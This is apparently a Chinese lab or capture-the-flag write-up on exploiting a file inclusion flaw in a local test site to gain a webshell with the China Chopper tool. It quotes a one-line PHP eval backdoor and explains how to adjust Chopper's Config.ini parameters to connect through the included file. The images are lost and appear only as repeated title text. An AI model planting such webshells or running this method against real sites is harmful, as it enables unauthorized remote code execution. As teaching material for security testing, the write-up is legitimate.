一个文件包含漏洞(需要利用菜刀原理)

时间:2024-03-19 10:38:53

一个文件包含漏洞(需要利用菜刀原理)

1.任务

通过你所学到的知识,测试该网站可能存在的包含漏洞,尝试获取webshell。

一个文件包含漏洞(需要利用菜刀原理)

2.分析

直接访问它包含的文件:http://192.168.223.134/test/md3oa/vulnerabilities/view.html

一个文件包含漏洞(需要利用菜刀原理)一个文件包含漏洞(需要利用菜刀原理)

查看view.html可以看到这里有一段PHP代码,取出来如下:

一个文件包含漏洞(需要利用菜刀原理)

上面代码解码后如下:

一个文件包含漏洞(需要利用菜刀原理)

3.菜刀原理与利用

这是一个非常经典的一句话木马,假设它已经上传:

一个文件包含漏洞(需要利用菜刀原理)

现在使用菜刀去连接,在菜刀配置好代理,代理配置如下:

一个文件包含漏洞(需要利用菜刀原理)

Burp抓取数据包如下:

一个文件包含漏洞(需要利用菜刀原理)

上面cmd的值,action名称以及值都是来菜刀配置文件Config.ini,如下:

一个文件包含漏洞(需要利用菜刀原理)一个文件包含漏洞(需要利用菜刀原理)

后台一句话木马最终执行:

@eval(@eval(base64_decode($_POST[action]));)

而2中:

一个文件包含漏洞(需要利用菜刀原理)

只需要把action修改为z0,并且Hello有值,如下是成功的:

一个文件包含漏洞(需要利用菜刀原理)

现在修改菜刀配置文件Config.ini。

一个文件包含漏洞(需要利用菜刀原理)一个文件包含漏洞(需要利用菜刀原理)

修改菜刀后面参数:

一个文件包含漏洞(需要利用菜刀原理)

Burp抓包,发现修改成功,如下所示:

一个文件包含漏洞(需要利用菜刀原理)

现在断开代理,直接用菜刀连接:

http://192.168.223.134/test/md3oa/vulnerabilities/fu1.php?file=view.html

一个文件包含漏洞(需要利用菜刀原理)